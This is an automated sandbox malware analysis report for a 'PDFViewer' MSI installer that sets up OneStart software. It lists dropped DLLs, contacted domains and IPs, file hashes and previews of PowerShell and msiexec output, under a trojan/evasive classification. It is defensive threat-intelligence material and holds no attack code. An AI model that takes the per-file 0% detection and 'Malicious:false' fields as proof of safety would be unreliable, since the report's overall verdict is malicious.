          C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dll | 0% | ReversingLabs | |
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          g8v1en.com | 1% | Virustotal | | Browse
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          g8v1en.com | 18.165.201.17 | true | false | | unknown
          d1xdao0g1hqd47.cloudfront.net | 52.222.137.11 | true | false | | high
          dpseqd9pkrc26.cloudfront.net | 143.204.14.118 | true | false | | high
          dhb63vq2dmigo.cloudfront.net | 143.204.14.137 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          http://dhb63vq2dmigo.cloudfront.net/ | false | | high
          http://d1xdao0g1hqd47.cloudfront.net/ | false | | high
          http://dpseqd9pkrc26.cloudfront.net/ | false | | high
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          143.204.14.137 | dhb63vq2dmigo.cloudfront.net | United States | | 16509 | AMAZON-02US | false
          143.204.14.118 | dpseqd9pkrc26.cloudfront.net | United States | | 16509 | AMAZON-02US | false
          18.165.201.17 | g8v1en.com | United States | | 3 | MIT-GATEWAYSUS | false
          143.204.214.220 | unknown | United States | | 16509 | AMAZON-02US | false
          143.204.9.38 | unknown | United States | | 16509 | AMAZON-02US | false
          52.222.137.11 | d1xdao0g1hqd47.cloudfront.net | United States | | 16509 | AMAZON-02US | false
          108.138.198.136 | unknown | United States | | 16509 | AMAZON-02US | false
                      Joe Sandbox Version:38.0.0 Beryl
                      Analysis ID:1298923
                      Start date and time:2023-08-28 18:56:03 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                      Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                      Number of analysed new started processes analysed:44
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      Analysis Mode:stream
                      Analysis stop reason:Timeout
                      Sample file name:PDFViewer_44882564 (1).msi
                      Detection:MAL
                      Classification:mal45.troj.evad.winMSI@53/186@10/21
                      Cookbook Comments:
                      • Found application associated with file extension: .msi
                      • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • Timeout during stream target processing, analysis might miss dynamic analysis data
                      • VT rate limit hit for: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:modified
                      Size (bytes):35772
                      Entropy (8bit):5.863974267876024
                      Encrypted:false
                      SSDEEP:
                      MD5:7129D476EBB70E1D1B04E707AC03FB8F
                      SHA1:B4D656533FA96FE55CD46AA3033ABC3BAB8CD864
                      SHA-256:97197D2676217C2C0554793D09612C9FB28DB8F96CCD8296E296C8ACE952CE17
                      SHA-512:B164B46C612680DB759EF7AA79386C75220225E35B67FCDE68915C7604A85A9946CF95EAFB8DFC1DD3B989CF4B6B85E064FB1F7EB8E1E0428438B597DB1D754E
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1464
                      Entropy (8bit):5.429144854396941
                      Encrypted:false
                      SSDEEP:
                      MD5:077C4EC28A1AB175A7A5BDE8902E8B64
                      SHA1:07EF38BC2C96C5F1681FC6B99DC0BFE66703A6EF
                      SHA-256:5993F990F7C73EF6832A7D453347D4F81F2543B9B364CD6B1E48F11F20C66746
                      SHA-512:3B5DE205FDAABE08011BAF12500CA2B511A3D8D3ED22BA97295A3940BE5D2F1C25241267A531D18C2D2F171900A54B01969657062A99FABA9DD7997EBF853976
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):8
                      Entropy (8bit):2.1556390622295662
                      Encrypted:false
                      SSDEEP:
                      MD5:262695B9C138D4B94087961840883F32
                      SHA1:2FD0EEA1F28F0E461DAB95FD2F11EC16C9AF8D75
                      SHA-256:082275AB46FD6D32421D8110FFEA3246FF9D2D0B238DC64ED095A1194AC0BD8C
                      SHA-512:B319AA08CC4A5EFC2D1869765EFFAA2AEC70C064486C7406C4CD00ACBB2739F7E7B9CC9C041F161A9FFC2CE3C7BBCC8654414A34692E9A0041DF5CAB9ADBF0CF
                      Malicious:false
                      Reputation:low
                      Preview:44882564
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):647840
                      Entropy (8bit):6.610508052590557
                      Encrypted:false
                      SSDEEP:
                      MD5:07EBB743BBD7230E04C23BCBAA03FC44
                      SHA1:8E6DEEE1FFB202F60C10AA7D7756395534E40DCF
                      SHA-256:194B29C26D925FDC1F1AA1802714118D0CA30E413C7FEA5C19A928EBA7CC43B0
                      SHA-512:F02B6F0CAA860BA97D5A887BBDB28A6D417B2AA4DDE91BEEFF57A99E05508A10B063EF1D025223FA2F566CC208F86401A38ABC445D20BF208C5A4F92BB53AC24
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):365216
                      Entropy (8bit):6.403210824336409
                      Encrypted:false
                      SSDEEP:
                      MD5:3144225F1A2DCCFDA435970964158357
                      SHA1:B535C5FCF4B4FDB2B9863CFE89C4362699BDF419
                      SHA-256:A99D2C6FD1667942A085F01784BD599762182FCE8A8F866FA12AC93F52AE2ED1
                      SHA-512:66017AB6A11017B749CD3045597A70B29BE375656FCC03DF6382DDF976B7F14B4DF2BBB378E1EED8DF75651CA9DF1C04E084F50DD8EB9EB7E056E54D47679621
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):560
                      Entropy (8bit):5.341802118140659
                      Encrypted:false
                      SSDEEP:
                      MD5:C9992361FC8E0CE715E89E550841B038
                      SHA1:0AD630B1A8B226FB36E44F245685CD12B916949C
                      SHA-256:30EA648D85B74900F82E5CF0A26BDD59BB232A377A70B6702344AFD419AEE097
                      SHA-512:C62200DB3EFAB8C038CC143B63DAA897A4A414EEE830D5103F874905B3EAD8E6B9EB2F858D6589F4161AD4443CD849CE563C1FDE206561CE268EE4ACE5610649
                      Malicious:false
                      Reputation:low
                      Preview:{"response" : "ok"}.."C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" ..C:\Windows\system32\msiexec.exe /V..C:\Windows\syswow64\MsiExec.exe -Embedding 5ADB98630CC4B226B2004FF6626A3D5C C.."C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" ..C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C.."C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2678
                      Entropy (8bit):4.421559387217024
                      Encrypted:false
                      SSDEEP:
                      MD5:F6248B1ED50FFB1185EC5BA785BDB5FD
                      SHA1:436BBC47F1953A54C6494FF1B4733AD256741129
                      SHA-256:04B5A175357FE073EDF386135B27FADF2F0D2F9D039C97F208ABCF15A143AC7A
                      SHA-512:EE5024AF7D887CB1ABC698E027C9258987BE4A7BC12F6991BC7F43008338B41ED1AE458832118CF5169B2BBCF1AA1D3F6F9AC719824F2F1B7EEC8CEF2798B748
                      Malicious:false
                      Reputation:low
                      Preview:....__GENUS : 2..__CLASS : Win32_Process..__SUPERCLASS : CIM_Process..__DYNASTY : CIM_ManagedSystemElement..__RELPATH : Win32_Process.Handle="2240"..__PROPERTY_COUNT : 45..__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}..__SERVER : user-PC..__NAMESPACE : root\cimv2..__PATH : \\user-PC\root\cimv2:Win32_Process.Handle="2240"..Caption : msiexec.exe..CommandLine : "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 .. (1).msi" ..CreationClassName : Win32_Process..CreationDate : 20230828175659.573607+060..CSCreationClassName : Win32_ComputerSystem..CSName : user-PC..Description : msiexec.exe..ExecutablePath : C:\Windows\System32\
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):425
                      Entropy (8bit):1.7799811226519884
                      Encrypted:false
                      SSDEEP:
                      MD5:092349A59A7F9D845C389877C5662F06
                      SHA1:877F53E967EFBA76AAFCAC0665CD6F5F55528420
                      SHA-256:826B24484BA66B4DA60802044F5BF51CAF65841A6176BF64CCE3B58A1FEBB3F5
                      SHA-512:9279F04F4570148BA0EB827F56714C0DC89D91B0478E486C50113D4E258EF5C8BCB94389454F10B0E93646ACC9A288C98CAF250EDA8EC99DABBE6CE204BBE8CE
                      Malicious:false
                      Reputation:low
                      Preview:.... Hive: HKEY_CURRENT_USER\SOFTWARE\OneStart.ai......Name Property ..---- -------- ..OneStart ......
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):583
                      Entropy (8bit):5.099893102603622
                      Encrypted:false
                      SSDEEP:
                      MD5:3130E62FBA508A6DE54DC4F9B0F7AC28
                      SHA1:490729721A5A98531AE677791CAA20943FC590AC
                      SHA-256:B289E780D6F54D07F4AA80111078EA564E34236931417FA48DAD90E74D6BFF3F
                      SHA-512:83C06A35F00F33D9B921094963EBBC7BEDBEFFD112F7A847F88782FEC7AF482A9E94ADE052AD271D7C97B0EE339366AAA5FBF9EEA5DECB913C8E0C15D057D549
                      Malicious:false
                      Reputation:low
                      Preview:Get-Content : Cannot find path 'C:\Users\user\AppData\Roaming\OneStart\.data\wc.json' because it does not exist...At C:\Users\user\AppData\Local\Temp\pss6893.tmp.ps1:20 char:12..+ ... $skInfo = Get-Content "$env:APPDATA/OneStart/.data/wc.json" | Out-S .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (C:\Users\user...t\.data\wc.json:String) [Get-Content], ItemNotFoundEx .. ception.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):621
                      Entropy (8bit):5.135718354468782
                      Encrypted:false
                      SSDEEP:
                      MD5:FBABF978ECD8DC64CE80FCC9A5A0E6F2
                      SHA1:2CF0D3C7FE349EB2CAD31A6F7F551199C93E5455
                      SHA-256:554F81D9F70ACCD907327A66CC34846A11AF789136FCCDFAE627693C1FF63445
                      SHA-512:ED5D2BA48B02B2B9AA4A57FC52D81F6B8BB3AB267C571BC40F3AE9C9AF63B61EE662787EB6C9CCFF83F29A02D4E93B95F4492A1BB9DEAEF41254FEC3E4592929
                      Malicious:false
                      Reputation:low
                      Preview:{"response" : "ok"}..Get-Content : Cannot find path 'C:\Users\user\AppData\Roaming\BBWC\.data\wc.json' because it does not exist...At C:\Users\user\AppData\Local\Temp\pss7052.tmp.ps1:31 char:13..+ ... $skInfo = Get-Content "$env:APPDATA/BBWC/.data/wc.json" | Out-S .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (C:\Users\user...C\.data\wc.json:String) [Get-Content], ItemNotFoundEx .. ception.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand.. ..{"response" : "ok"}..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3572
                      Entropy (8bit):4.5515870399290295
                      Encrypted:false
                      SSDEEP:
                      MD5:0CB7E1FADAA96EB8103DECCDC2A9B702
                      SHA1:1824F466F787387502918EC064122C5F6499E517
                      SHA-256:38A155504BEBD8B6289CE7D3106E1EF2620BFC362FD663AAED72703A4912380E
                      SHA-512:5AA71CBE4DCB2DA00705223AC78945458219520230ED42624B524AE52A115AF5E4701D7262A0AC993C2AC0B3DF19B0827062C97202113C57546BD5A993519C6E
                      Malicious:false
                      Reputation:low
                      Preview:....__GENUS : 2..__CLASS : Win32_Process..__SUPERCLASS : CIM_Process..__DYNASTY : CIM_ManagedSystemElement..__RELPATH : Win32_Process.Handle="6756"..__PROPERTY_COUNT : 45..__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}..__SERVER : user-PC..__NAMESPACE : root\cimv2..__PATH : \\user-PC\root\cimv2:Win32_Process.Handle="6756"..Caption : msiexec.exe..CommandLine : "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 .. (1).msi" ..CreationClassName : Win32_Process..CreationDate : 20230828175630.762617+060..CSCreationClassName : Win32_ComputerSystem..CSName : user-PC..Description : msiexec.exe..ExecutablePath : C:\Windows\System32\
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):610
                      Entropy (8bit):5.134608334249833
                      Encrypted:false
                      SSDEEP:
                      MD5:172F59FFC6853FAEEA85E9ACE14AF5CD
                      SHA1:C7CECED24069489EFD89F0C7FED594F073FFF53D
                      SHA-256:64A3E5C5F9AA12C9600239A4E3C93F0E199F718173ECE5837C3089EE7376B813
                      SHA-512:5B6E51126DFFB4A3639A4370503EF90068CB6C913534F602D534A295A7BF82DFA2F058BCAC4793F89488920963231B2D0FF8D1469AB966D66622D0478139AE2A
                      Malicious:false
                      Reputation:low
                      Preview:Get-ItemPropertyValue : Cannot find path 'HKCU:\SOFTWARE\OneStart.ai\OneStart Software' because it does not exist...At C:\Users\user\AppData\Local\Temp\pss9D8A.tmp.ps1:13 char:16..+ ... $ret = Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\OneStart.ai\O .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (HKCU:\SOFTWARE\...eStart Software:String) [Get-ItemPropertyValue], Item .. NotFoundException.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetItemPropertyValueCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):424
                      Entropy (8bit):2.4898548841924786
                      Encrypted:false
                      SSDEEP:
                      MD5:48E7764699FC5D737547E02EC51EED0F
                      SHA1:0D6BAE6E5936361E168A01DCD83DB3CBB26474E3
                      SHA-256:D4C7988A080228A143E643C3CF9C7B0EBFD49777E780C8B1E6F75EDFC97A8B37
                      SHA-512:684A944D239B88F3E437A54600CFF76836EB8079079AEE870D80C6890C22E3DCB3AD99EB434C42DD703EE6F6CECE6BD0DDE5D643FB11AE53F0D4485F8BF97BC3
                      Malicious:false
                      Reputation:low
                      Preview:.... Directory: C:\Users\user\AppData\Roaming......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 8/28/2023 6:56 PM OneStart ......
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1822
                      Entropy (8bit):3.5700724147522136
                      Encrypted:false
                      SSDEEP:
                      MD5:F994415492500FEE4841C40390463725
                      SHA1:710482FC7B317299E6BFC36028885B8942EF256F
                      SHA-256:04313C0DF4A79430CD4F079CA16E6691611525C05D8263200DFC8641A39E3AA0
                      SHA-512:1793C923DC9B301A6CA09B9B87B2EA117BA207465AE8D7924A687AC2A1F90F31A6689112CC4602F205E83A8A94DC415656DD8D00D571298D04CCDADD2AA9F3A5
                      Malicious:false
                      Reputation:low
                      Preview:.... Directory: C:\Users\user\AppData\Local......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 8/28/2023 6:56 PM OneStart.ai ...... Directory: C:\Users\user\AppData\Local\OneStart.ai......Mode LastWriteTime Length Name ..---- ------------- ------ ---- ..d----- 8/28/2023 6:56 PM OneStart ...... Directory: C:\Users\user\AppData\Local\OneStart.ai\OneStart......Mode LastWriteTime Length Name
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):583
                      Entropy (8bit):5.073200575099075
                      Encrypted:false
                      SSDEEP:
                      MD5:D76204F2E1427CE2539B536DA8B39E11
                      SHA1:32972DE8DF37823922033664DC4C139EB461002E
                      SHA-256:21A7A1115F4628FFC8AF2927333E8E8F1A681178C9CFB949A4DEF38951C18974
                      SHA-512:24201FF3E911AC7EE06C16D4E6CCF5E073CFF0BDAFF17D7ED123FA5BE754AA941834949EDD550B3FA69F9C635E554AC528C9DA627D8DB6578EDAAC83ECC6D4DC
                      Malicious:false
                      Reputation:low
                      Preview:Get-Content : Cannot find path 'C:\Users\user\AppData\Roaming\OneStart\.data\wc.json' because it does not exist...At C:\Users\user\AppData\Local\Temp\pssC2EC.tmp.ps1:20 char:12..+ ... $skInfo = Get-Content "$env:APPDATA/OneStart/.data/wc.json" | Out-S .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (C:\Users\user...t\.data\wc.json:String) [Get-Content], ItemNotFoundEx .. ception.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):610
                      Entropy (8bit):5.123333185793149
                      Encrypted:false
                      SSDEEP:
                      MD5:72C6C04EAEFF65DD0F64909076709F33
                      SHA1:DE3A04AB5D8F0B073A595117F62C0C61181AE420
                      SHA-256:881C40A240EC92569982D5CA6F1E74D92AE30B00636872ACAAF1C1FBA807C216
                      SHA-512:9F6EE97ADBAAD6AA12EEEE9DFA4D2872AABFF8989B21433909D4E445402C19011D7D99B13B4BF72E226FBACD8D3A0185324FABE02620688CB43B271DD5EC8492
                      Malicious:false
                      Reputation:low
                      Preview:Get-ItemPropertyValue : Cannot find path 'HKCU:\SOFTWARE\OneStart.ai\OneStart Software' because it does not exist...At C:\Users\user\AppData\Local\Temp\pssC7FA.tmp.ps1:13 char:16..+ ... $ret = Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\OneStart.ai\O .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (HKCU:\SOFTWARE\...eStart Software:String) [Get-ItemPropertyValue], Item .. NotFoundException.. + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetItemPropertyValueCommand.. ..{"response" : "ok"}..
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):5
                      Entropy (8bit):2.321928094887362
                      Encrypted:false
                      SSDEEP:
                      MD5:1764352FBFD4CC5558C37EDD72A0A3A5
                      SHA1:4996051E3D94C9DC04D2EE00CE2650F59A9BBF0B
                      SHA-256:99CFF99449DC635CAFEA9274EB80DC34711977494E2CF5756899BE115D296FAF
                      SHA-512:81A63F26F0C91E6FA650109CD007CE59E929CBF96BF68EC8DD8E35D6011C42730C7B540305F5DFBC421491655FB4BF6A650021D7BDB19FECE40447C2460E2284
                      Malicious:false
                      Reputation:low
                      Preview:OstWC
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Reputation:low
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):68
                      Entropy (8bit):3.0695232318239793
                      Encrypted:false
                      SSDEEP:
                      MD5:D09597341602C15067A664CA5A163E14
                      SHA1:32EA3DB58189672CB3AF1FA328605E3D99FB0A86
                      SHA-256:C69861A35F959AEE141F8806A4D438D328F434877A506F9CC698C8ABB2CDA106
                      SHA-512:AD6A7D4AA5578007B48EFF16B44498AD980C3F08D3A3CDD0B60304D711DB297FBB4230E05DC40964AF255345E2570FD6540501C428B47A6554967013F82A19EB
                      Malicious:false
                      Reputation:low
                      Preview:FHN :<->: 0..FHN :<->: 44882564..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):42
                      Entropy (8bit):3.078187675161839
                      Encrypted:false
                      SSDEEP:
                      MD5:1E463AB8C9D6D6D7EF0AB37B9C951883
                      SHA1:A232F748DBAE224F9B5FF907E5E84E1DAD9EF226
                      SHA-256:BF9E2D5B66D4D5C6B3589FAE987ED81ED656C5C54086B111ADB1AD877A5BD36D
                      SHA-512:3AF2A826D108217AAF84CFBB980C4B5FA078ECAD89A5FC7F12721383C7244700B7C48D4C70EBCC84CDB774CAA6334A813EA82A56DA937B1B3E7A56F891CA896E
                      Malicious:false
                      Reputation:low
                      Preview:FHN :<->: 44882564..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):90
                      Entropy (8bit):3.339355693836695
                      Encrypted:false
                      SSDEEP:
                      MD5:CE6FC92A4A5CBC8E91398BB47F9EF89D
                      SHA1:CFB3A08DCDCB75D76FC41D6DE515C7823A3C61EF
                      SHA-256:3D0EEE82C3492CA6D81DD15FE4F139FF18911C15A0D85E6AB0E8861860225726
